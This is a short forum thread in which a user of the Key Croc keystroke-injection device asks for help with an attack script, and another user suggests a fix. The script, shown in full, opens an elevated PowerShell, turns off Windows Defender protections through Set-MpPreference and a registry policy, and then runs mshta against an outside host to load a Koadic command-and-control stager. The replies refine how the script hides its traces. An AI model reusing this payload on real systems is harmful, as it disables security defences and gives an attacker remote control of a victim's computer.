fneagle Posted November 29, 2020 Share Posted November 29, 2020 Hi, I'm trying to get a simple script running with the Key Croc. I had many problems in the beginning with Wifi, language and special keys, but have made some progress. First of all: It is very difficult to get a simple script running with the Croc. You always have to switch between arming and attack mode. Sometimes it is working, sometimes not. I can even see no reason why it is so unstable. My feedback at the moment: It is not worse to use it. Keylogger okay, but for the rest I'll use different tools. I don't want to give up and would like to finish my project with the Croc. Here is my script: MATCH easy QUACK DELAY 1000 # Disable Defender ATTACKMODE HID QUACK GUI-r QUACK DELAY 1000 export DUCKY_LANG=de QUACK DELAY 1000 QUACK STRING "powershell Start-Process powershell -Verb runAS" QUACK ENTER sleep 3 QUACK ALT j QUACK STRING "Set-MpPreference -DisableRealtimeMonitoring \$true -SubmitSamplesConsent NeverSend -DisableIOAVProtection \$true -DisableIntrusionPreventionSystem \$true -DisableBlockAtFirstSeen \$true -DisableBehaviorMonitoring \$true -MAPSReporting 0" QUACK ENTER sleep 1 QUACK STRING "Set-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware 1" QUACK ENTER #Start Attack with Koadic and get a Zombi QUACK STRING "mshta http://192.168.171.32:443/index" QUACK ENTER Here is my question: The script is running fine. The Windows Defender is disabled and a can run "mshta http://" to get a "Zombi" on my Koadic Server. The problem is, that after running the last command, I have no focus on the PowerShell window. This means, that I'm not able to add STRING exit to close the window. If I use the mouse and click on the window, I can add string again. Any suggestions? Quote Link to comment Share on other sites More sharing options...
Mohamed A. Baset Posted November 29, 2020 Share Posted November 29, 2020 (edited) Modify the last injected payload from: QUACK STRING "mshta http://192.168.171.32:443/index" to QUACK STRING "mshta http://192.168.171.32:443/index;exit" Edited November 29, 2020 by Mohamed A. Baset Quote Link to comment Share on other sites More sharing options...
fneagle Posted November 30, 2020 Author Share Posted November 30, 2020 Thanks! I'll try it. Meanwhile, I did is this way: QUACK GUI-r QUACK STRING "tskill powershell" Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.